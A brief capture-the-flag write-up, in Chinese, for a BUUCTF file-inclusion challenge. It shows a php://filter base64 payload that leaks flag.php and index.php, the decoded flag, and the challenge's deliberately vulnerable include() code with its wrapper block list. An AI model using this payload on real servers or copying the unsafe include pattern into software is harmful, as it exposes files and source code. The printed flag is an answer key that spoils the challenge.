BUUCTF:[ACTF2020 新生赛]Include

题目地址:https://buuoj.cn/challenges#[ACTF2020%20%E6%96%B0%E7%94%9F%E8%B5%9B]Include

在这里插入图片描述
在这里插入图片描述
文件包含直接伪协议读取flag.php

?file=php://filter/convert.base64-encode/resource=flag.php
PS C:\Users\Administrator> php -r "var_dump(base64_decode('PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7NjNiNWRkYjAtNjM0Zi00ZGY4LTljZTgtZjA1NTZkM2U3OGExfQo='));"
string(86) "<?php
echo "Can you find out the flag?";
//flag{63b5ddb0-634f-4df8-9ce8-f0556d3e78a1}
"
?file=php://filter/convert.base64-encode/resource=index.php
PS C:\Users\Administrator> php -r "var_dump(base64_decode('PG1ldGEgY2hhcnNldD0idXRmOCI+Cjw/cGhwCmVycm9yX3JlcG9ydGluZygwKTsKJGZpbGUgPSAkX0dFVFsiZmlsZSJdOwppZihzdHJpc3RyKCRmaWxlLCJwaHA6Ly9pbnB1dCIpIHx8IHN0cmlzdHIoJGZpbGUsInppcDovLyIpIHx8IHN0cmlzdHIoJGZpbGUsInBoYXI6Ly8iKSB8fCBzdHJpc3RyKCRmaWxlLCJkYXRhOiIpKXsKCWV4aXQoJ2hhY2tlciEnKTsKfQppZigkZmlsZSl7CglpbmNsdWRlKCRmaWxlKTsKfWVsc2V7CgllY2hvICc8YSBocmVmPSI/ZmlsZT1mbGFnLnBocCI+dGlwczwvYT4nOwp9Cj8+Cg=='));"
string(289) "<meta charset="utf8">
<?php
error_reporting(0);
$file = $_GET["file"];
if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){
        exit('hacker!');
}
if($file){
        include($file);
}else{
        echo '<a href="?file=flag.php">tips</a>';
}
?>
"

猜你喜欢

转载自blog.csdn.net/mochu7777777/article/details/108943796